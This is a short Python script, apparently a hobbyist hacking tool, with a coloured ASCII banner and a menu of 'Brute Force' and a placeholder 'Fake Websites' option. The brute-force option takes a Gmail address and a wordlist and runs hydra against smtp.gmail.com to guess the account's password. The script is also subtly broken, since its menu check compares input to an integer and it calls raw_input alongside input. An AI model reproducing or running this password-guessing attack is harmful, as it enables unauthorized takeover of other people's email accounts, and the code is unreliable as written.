import os, sys, time
from time import sleep as timeout
os.system("figlet Brute Force")
print('\033[1;31m    __       _                ')
time.sleep(0.1)
print('\033[1;33;40m   / /      (_)               ')
time.sleep(0.1)
print('\033[1;35;40m  / /___   ___ _ __ _   _ ___ ')
time.sleep(0.1)
print("\033[1;36;40m | '_ \ \ / / | '__| | | / __|")
time.sleep(0.1)
print("\033[0;37;40m | (_) \ V /| | |  | |_| \__ \ ")
time.sleep(0.1)
print("\033[1;31;40m  \___/ \_/ |_|_|   \__,_|___/")
time.sleep(0.1)
print("================================")
print("\033[1;37;40m        Coded by @1zsb          ")
print("================================\n")
print("                           ______")
time.sleep(0.1)
print("\033[1;37;40m        |\_______________ (_____\\______________")
time.sleep(0.1)
print("\033[1;31;40mHH======#H###############H#######################")
time.sleep(0.1)
print('\033[1;37;40m        " ~""""""""""""""`##(_))#H\"""""Y########')
time.sleep(0.1)
print('                          ))    \#H\       `"Y###')
time.sleep(0.1)
print('                          "      }#H)\n')

print("[1] Brute Force")
print("[2] Fake Websites\n")
option = input('root@root:~# ')

if option == 1:
   os.system("clear")
   os.system("figlet Gmail Brute Force")
   email = raw_input("[*] Email Address : ")
   word = raw_input("[*] Wordlist : ")
   os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word))
   sys.exit()
else:
    print("Soon")

